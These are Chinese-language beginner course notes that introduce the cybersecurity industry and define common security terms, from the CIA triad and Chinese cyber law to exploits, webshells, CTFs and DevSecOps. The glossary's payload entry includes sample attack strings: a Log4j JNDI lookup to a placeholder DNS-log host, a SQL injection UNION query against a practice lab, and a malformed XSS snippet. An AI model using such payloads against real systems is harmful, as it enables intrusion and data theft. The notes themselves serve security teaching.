第一章-网络安全行业

第一章-网络安全行业

1.1-什么是网络安全

概念

网络安全：网络空间安全（Cyber Security）

信息系统

信息系统（Information System），是由计算机硬件、网络和通信设备、计算机软件、信息资源、信息用户和规章制度组成的以处理信息流为目的的人机一体化系统。

信息系统安全三要素（CIA）（面试基础考点）

• 保密性（confidentiality） [ˌkɒnfɪˌdenʃiˈæləti]
• 完整性（Integrity） [ɪnˈteɡrəti]
• 可用性（Availability） [əˌveɪləˈbɪləti]

其他（了解）

• 抗抵赖性
• 可控性
• 真实性、时效性、合规性、公平性、可靠性、隐私性

网络空间安全

包括了国家安全、城市安全、经济安全、社会安全、生产安全、人身安全等在内的“大安全”

国家网络空间安全战略

网络空间和海、陆、空、天，并称为五大空间或五大疆域

http://www.cac.gov.cn/2016-12/27/c_1120195926.htm

网络空间关注点

• 信息系统——网络空间域、物理空间域社会空间域
• 技术——法律、政策、技术、管理、产业、教育
• 信息系统生命周期——时时刻刻

网络空间管理

《中华人民共和国网络安全法》

《Cybersecurity Law of the People Republic of China》

网络空间安全管理流程

1. 确定网络信息安全管理对象；
2. 评估网络信息安全管理对象的价值；
3. 识别网络信息安全管理对象的威胁；
4. 识别网络信息安全管理对象的脆弱性；
5. 确定网络信息安全管理对象的风险级别；
6. 制定网络信息安全防范体系及防范措施；
7. 实施和落实网络信息安全防范措施；
8. 运行/维护网络信息安全设备、配置。

1.2-安全常用术语1

黑客hacker：对计算机非常擅长的人，窃取数据、破坏计算机系统（anonymous）

脚本小子：刚刚入门安全行业，学习了一些技术，只会只用现成的工具或者从网上复制代码

白帽子：白帽子的目的是发现企业的漏洞并且上报给企业，帮助其解决风险问题（360补天、漏洞盒子、CNVD、CNNVD）

红帽黑客：有正义感、爱国的黑客，利用技术维护国家网络安全，并且对外来的攻击进行反击

漏洞（vulnerability，简称vul或vuln)：指的是硬件、软件、协议等等存在的安全缺陷（http://www/cnnvd.org.cn/web/wz/bzxqByld.tag?id=3&mkid=3）

POC（Proof of Concept）:能证明漏洞存在的代码（例：${jndi:ldap://xxxxxx.dnslog.cn/test}

exp（Exploit——利用）：执行了这一段利用代码之后，就能够达到攻击的目的（msf）

payload：攻击载荷；SQL注入——http://localhost/sqli-labs/Less-3/?id=-1’)union select 1,1,database() --+；XSS——< script>alter(1)；log4j——${jndi:ldap://xxxxxx.domain.cn/test}

0day：使用量非常大的通用产品漏洞已经被发现了（还没有公开），官方还没有发布补丁或者修复方法的漏洞

1day：漏洞的POC和EXP已经被公开了，但是很多人还来不及修复，这个叫1day漏洞

Nday漏洞：指已经发布官方补丁的漏洞，并且时间已经过去很久的漏洞。

漏扫：基于数据库对漏洞进行自动化扫描

补丁（patch）：漏洞的修复程序

1.2-安全常用术语2

渗透（penetration）：黑客入侵了网站或者计算机系统，获取到控制计算机权限的过程

渗透测试（penetration test）：用黑客入侵的方式对系统进行安全测试，目的是找出和修复安全漏洞，在这个过程中不会影响系统的正常运行，也不会破坏数据

木马（Trojan horse）：隐藏在计算机中的恶意程序

病毒（Virus）：恶意代码或程序

杀毒软件：瑞星、江民、金山、国外的诺顿、卡巴斯基、McAfee、360

免杀：绕过杀毒软件

肉鸡：已经被黑客获得权限的机器，可能是个人电脑也可能是企业或者政府单位的服务器，通常情况下因为使用者并不知道已经被入侵，所以黑客可以长期获得权限和控制。

抓鸡：利用出现概率非常高漏洞（比如log4j、永恒之蓝），使用自动化获取肉鸡的行为

跳板机：黑客为了防止被追溯和识别身份，一般都不会用自己的电脑发起攻击，而是利用获取的肉鸡来攻击其他目标，这个肉鸡就充当一个跳板的角色

DDoS（Distributed Denial of Service——分布式拒绝服务攻击）：发起大量恶意请求，导致正常用户无法访问

后门（backdoor）：黑客为了对主机进行长期的控制，在机器上种植的一段程序或留下一个“入口”

中间人攻击（Man-in-the-Middle Attack——MITM攻击）：运行中间服务器，拦截并篡改数据

网络钓鱼：钓鱼网站指的是冒充的网站，用来窃取用户的账号密码

1.2-安全常用术语3

webshell：

shell是一种命令执行工具，可以对计算机进行控制；

webshell就是asp、php、jsp之外的web代码文件，通过这些代码文件可以执行任意的命令，对计算机做任意的操作

分类：小马；一句话木马——godzilla\behinder\ant sword；大马

Getshell：获得命令执行环境的操作；

Redis的持久化功能、MySQL的写文件功能、MySQL的日志记录功能、上传功能、数据备份功能、编辑器

提权：权限提升——Privilege Escalation；

普通用户权限，把自己提升为管理员权限的操作就叫做提权——www——root

拿站：指得到一个网站最高权限，即得到后台和管理员名字和密码

拖库（脱裤）：拖库指的是网站被入侵以后，黑客把所有的数据都导出，窃取到了数据文件

撞库：用获得的裤子去批量登陆其他的网站

旁站入侵：入侵同服务器的其它网站

横向移动：攻击者入侵一台服务器成功后，基于内部网络，继续入侵同网段的其他机器

代理（Proxy）：帮我们发起网络请求的一台服务器

VPN（Virtual Private Network）：代理；加密通信；办公——在家里连接到公司内网

蜜罐（Honeypot）：吸引攻击者攻击的伪装系统，用来实现溯源和反制

沙箱（Sandbox）：沙箱是一种按照安全策略限制程序行为的执行环境，就算有恶意代码，也只能影响沙箱环境而不会影响到操作系统

靶场：模拟的有漏洞的环境；

可以是网站、容器、操作系统；

类型：

web综合靶场——DVWA、pikachu、bwapp

web专用靶场——sqli-labs、upload-labs、xsslabs

漏洞复现靶场——比如CVE 44228

操作系统靶场——比如vulnhub靶场

CTF靶场——专门用来练习CTF题目，每个人都有一个独立的环境

堡垒机：跳板机——jumpserver；

运维审计系统——管理资源，审批、审计、访问控制、事件记录

WAF：Web Application Firewall——Web应用防火墙；

对HTTP/HTTPS的流量内容进行分析，拦截恶意攻击行为

1.2-安全常用术语4

APT（Advanced Persistent Threat）：APT攻击；

高级可持续威胁攻击，指某组织在网络上对待定对象展开的持续有效的攻击活动；

报告：2021深信服APT攻防趋势半年洞察

护网（HVV）：国家组织牵头组织事业单位，国企单位，名企单位等开展攻防两方的网络安全演习

CTF：

Capture The Flag夺旗赛：起源于1996年DEFCON全球黑客大赛；解出题目，获得flag，就可以得分

是一种黑客技术竞赛：解题形式——Jeopardy；

攻防形式——Attack-Defense

方向：Reverse、PWN、Web、Crypto、Misc、Mobile

在线CTF：bugku——https://ctf.bugku.com/challenges/index.html

北京联合大学——https://buuoj.cn/challenges

CTFHub——https://www.ctfhub.com/

bmzCTF——http://bmzclub.cn/challenges

攻防世界——https://adworld.xctf.org.cn

CTFSHOW——https://ctf.show/challenges

CVE：Common Vulnerabilities and Exposures——通用漏洞披露；

Mitre；

例如：CVE-2021-44228

https://www.cve.org/

CNVD：国家信息安全漏洞共享平台——https://www.cnvd.org.cn/;

国家计算机应急响应中心CNCERT维护——https://www.cert.org.cn/publish/main/index.html

应急响应：一个公司为了应对各种安全事件所做的准备和事后采取的措施

SRC：Security Response Center——企业的应急响应中心;

http://0xsafe.org/

公益SRC：https://www.vulbox.com/;

https://src.sjtu.edu.cn/

网络空间测绘：网络空间资源收录；

网络空间搜索引擎：www.shodan.io

fofa.so

www.zoomeye.org

ATT&CK：Adversarial Tactics，Techniques，and Common Knowledge——对抗战术、技术和通用知识（攻击者技术的知识库）；

Mitre；

风险分析模型——收集威胁情报，模拟APT攻击

逆向（reverse）：把程序还原为源代码，分析程序的运行过程

DevOps（Development+Operations）：开发测试运维一体化

CICD：

包括：持续集成（Continuous Integration）

持续交付（Continuous Delivery）

持续部署（Continuous Deployment）

具体技术——Git代码管理、Jenkins版本管理、代码扫描、自动化测试

DevSecOps（Development + Security + Operations）：安全开发与运维

等保：网络安全等级保护；

要求相关行业的单位和公司的信息系统必须进行定级，然后在公安机关备案，然后建设整改，然后由测评机构评级，并且持续维护和监督